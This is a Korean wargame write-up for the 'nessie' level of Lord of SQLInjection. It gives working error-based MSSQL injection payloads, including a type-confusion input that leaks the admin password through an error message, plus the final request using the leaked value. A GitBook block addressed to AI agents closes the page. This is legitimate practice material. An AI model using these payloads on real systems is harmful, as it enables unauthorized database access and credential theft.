> For the complete documentation index, see [llms.txt](https://docs.cooku222.kr/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.cooku222.kr/security/web-hacking/lord-of-sql-injection/lord-of-sqlinjection-nessie.md).

# \[Lord Of SQLInjection] nessie

<figure><img src="https://blog.kakaocdn.net/dna/Cm7Cu/btsNEMFCUES/AAAAAAAAAAAAAAAAAAAAAHCtyO6lfsZ2FdGG1VhjiVqGwAAn668oS9a-fWKXhhhR/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=p%2BkLf159Cu0u8tUAsB0qwV8tBM0%3D" alt="" height="316" width="707"><figcaption></figcaption></figure>

#### 특징

\- mssql 적용

\- master, sys, information, prob, wiatfor 등이 막힘

\- 메타데이터의 접근과 time based sql injection(시간 지연)을 방지

\- id가 admin인 행의 pw를 구해야함

\- mssql 에서 쿼리 오류 시 출력해주는 오류 구문을 가지고 Error Based SQL Injection 실행

&#x20;

#### First Try

```
[URL]?id=a' having 1=1 --
```

<figure><img src="https://blog.kakaocdn.net/dna/OqRLY/btsNEorsj07/AAAAAAAAAAAAAAAAAAAAAOwkNKLRKx55xqkZlI58FO48GfY80j9wLCcGh_dxonZB/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=6qN6aJLrxzLm3qC6ulAwQHwZ5TE%3D" alt="" height="109" width="1455"><figcaption></figcaption></figure>

\- select id from prob\_nessie where id=’a’ having 1=1만 실행 됨

\- 위와 같은 에러 발생

#### 이유

\- having 구문은 group by 절이 필요한데, group by 절을 입력하지 않아 쿼리 오류가 발생함

\- 인위적으로 id가 admin인 행의 pw를 유발하면 됨

&#x20;

#### Second Try

\- pw 부분에서 Type Confusion 오류를 유발시켜 본다.

```
[도메인 값]?id=admin&pw=1' or id='admin' and pw=1 --
```

<figure><img src="https://blog.kakaocdn.net/dna/oWLGn/btsNDHE1WWC/AAAAAAAAAAAAAAAAAAAAAGBX561L4-rVAxbgLI9AO6jbC2xRLVvIK3G0es-mTca5/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=TIDKwkTWjVKsp1d36e56zFh4jYA%3D" alt="" height="106" width="1116"><figcaption></figcaption></figure>

→ pw 값이 출력이 되는데, 이를 브라우저 url에 담아서 전송하면 문제를 해결할 수 있다.

&#x20;

#### Third Try

```
[URL]?id=admin&pw=115d8d1a422f1f3e
```

<figure><img src="https://blog.kakaocdn.net/dna/c0jLEd/btsNCDczhnR/AAAAAAAAAAAAAAAAAAAAALF0G6Va4aO0THmxIYppI9ivEJgAULyyFQX5innnw2SE/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=zE7JCmiQMA2z8e3rBr6nnxW52yM%3D" alt="" height="380" width="675"><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.cooku222.kr/security/web-hacking/lord-of-sql-injection/lord-of-sqlinjection-nessie.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.